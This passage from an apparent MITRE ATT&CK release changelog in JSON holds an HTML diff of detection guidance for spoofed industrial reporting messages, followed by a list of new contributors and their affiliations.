class=\"diff_header\">></td><td nowrap=\"nowrap\">.org/techniques/T1557/001).&nbsp;Spoofed&nbsp;reporting&nbsp;messages&nbsp;may&nbsp;b</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">etected&nbsp;by&nbsp;reviewing&nbsp;the&nbsp;content&nbsp;of&nbsp;automation&nbsp;protocols,&nbsp;ei</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;detected&nbsp;by&nbsp;reviewing&nbsp;the&nbsp;content&nbsp;of&nbsp;automation&nbsp;protocols,</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ther&nbsp;through&nbsp;detecting&nbsp;based&nbsp;on&nbsp;expected&nbsp;values&nbsp;or&nbsp;comparing</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;either&nbsp;through&nbsp;detecting&nbsp;based&nbsp;on&nbsp;expected&nbsp;values&nbsp;or&nbsp;compar</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;to&nbsp;other&nbsp;out&nbsp;of&nbsp;band&nbsp;process&nbsp;data&nbsp;sources.&nbsp;Spoofed&nbsp;messages</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing&nbsp;to&nbsp;other&nbsp;out&nbsp;of&nbsp;band&nbsp;process&nbsp;data&nbsp;sources.&nbsp;Spoofed&nbsp;messa</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;may&nbsp;not&nbsp;precisely&nbsp;match&nbsp;legitimate&nbsp;messages&nbsp;which&nbsp;may&nbsp;lead&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ges&nbsp;may&nbsp;not&nbsp;precisely&nbsp;match&nbsp;legitimate&nbsp;messages&nbsp;which&nbsp;may&nbsp;le</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">to&nbsp;malformed&nbsp;traffic,&nbsp;although&nbsp;traffic&nbsp;may&nbsp;be&nbsp;malformed&nbsp;for&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ad&nbsp;to&nbsp;malformed&nbsp;traffic,&nbsp;although&nbsp;traffic&nbsp;may&nbsp;be&nbsp;malformed&nbsp;f</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">many&nbsp;benign&nbsp;reasons.&nbsp;Monitor&nbsp;reporting&nbsp;messages&nbsp;for&nbsp;changes&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;many&nbsp;benign&nbsp;reasons.&nbsp;Monitor&nbsp;reporting&nbsp;messages&nbsp;for&nbsp;chang</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">in&nbsp;how&nbsp;they&nbsp;are&nbsp;constructed.&nbsp;&nbsp;Various&nbsp;techniques&nbsp;enable&nbsp;spoo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;in&nbsp;how&nbsp;they&nbsp;are&nbsp;constructed.&nbsp;&nbsp;Various&nbsp;techniques&nbsp;enable&nbsp;s</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">fing&nbsp;a&nbsp;reporting&nbsp;message.&nbsp;Consider&nbsp;monitoring&nbsp;for&nbsp;[Rogue&nbsp;Mas</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">poofing&nbsp;a&nbsp;reporting&nbsp;message.&nbsp;Consider&nbsp;monitoring&nbsp;for&nbsp;[Rogue&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ter](https://attack.mitre.org/techniques/T0848)&nbsp;and&nbsp;[Adversa</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Master](https://attack.mitre.org/techniques/T0848)&nbsp;and&nbsp;[Adve</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ry-in-the-Middle](https://attack.mitre.org/techniques/T0830)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rsary-in-the-Middle](https://attack.mitre.org/techniques/T08</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;activity.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">30)&nbsp;activity.</td></tr>\n        </tbody>\n    </table>"
                }
            ],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        }
    },
    "new-contributors": [
        "Alberto Garcia",
        "Alex Soler, AttackIQ",
        "Alex Wong",
        "Arad Inbar",
        "Arad Inbar, Fidelis Security",
        "Arun Seelagan, CISA",
        "Austin Clark, @c2defense",
        "Blake Strom, Microsoft Threat Intelligence",
        "Caio Silva",
        "Cian Heasley",
        "Contributor: Dominik Breitenbacher, ESET",
        "Daniel Feichter, @VirtualAllocEx, Infosec Tirol",
        "Dominik Breitenbacher, ESET",
        "Dongwook Kim, KISA",
        "Dragos Threat Intelligence",
        "Emile Kenning, Sophos",
        "Expel",
        "Gal Singer, @galsinger29, Team Nautilus Aqua Security",
        "Gilberto P\u00e9rez",
        "Gordon Long, LegioX/Zoom, asaurusrex",
        "Ibrahim Ali Khan",
        "Jaesang Oh, KC7 Foundation",
        "Janantha Marasinghe",
        "Joe Gumke, U.S. Bank",
        "Jorell Magtibay, National Australia Bank Limited",
        "Kiyohito Yamamoto, RedLark, NTT Communications",
        "Kyaw Pyiyt Htet (@KyawPyiytHtet)",
        "Lab52 by S2 Grupo",
        "Liran Ravich, CardinalOps",
        "Lucas Heiligenstein",
        "Manikantan Srinivasan, NEC Corporation India",
        "Marco Pedrinazzi, @pedrinazziM, InTheCyber",
        "Matt Snyder, VMware",
        "Mayuresh Dani, Qualys",
        "Menachem Goldstein",
        "Nathaniel Quist, Palo Alto Networks",
        "Nay Myo Hlaing (Ethan), DBS Bank",
        "Patrick Mkhael (aka Pinguino)",
        "Pawel Partyka, Microsoft Threat Intelligence",
        "Pedro Rodriguez",
        "Pooja Natarajan, NEC Corporation India",
        "Prasad Somasamudram, McAfee",
        "Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team",
        "Rich Rafferty (NR Labs)",
        "Rob Smith",
        "Sarathkumar Rajendran, Microsoft Defender365",
        "Sekhar Sarukkai, McAfee",
        "Serhii Melnyk",
        "SeungYoul Yoo, AhnLab",
        "Stijn Geerts",
        "Syed Ummar Farooqh, McAfee",
        "Taewoo Lee, KISA",
        "Takemasa Kamatani , NEC Corporation",
        "Tim (Wadhwa-)Brown",
        "Tommaso Tosi, @tosto92, InTheCyber",
        "Uriel Kosayev",
        "Vikas Singh, Sophos",
        "V\u00edctor Alba",
        "Wai Linn Oo, Kernellix Co.,Ltd.",
        "Wietze Beukema @Wietze",
        "Yusuke Kubo, RedLark, NTT Communications",
        "Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security"
    ]
}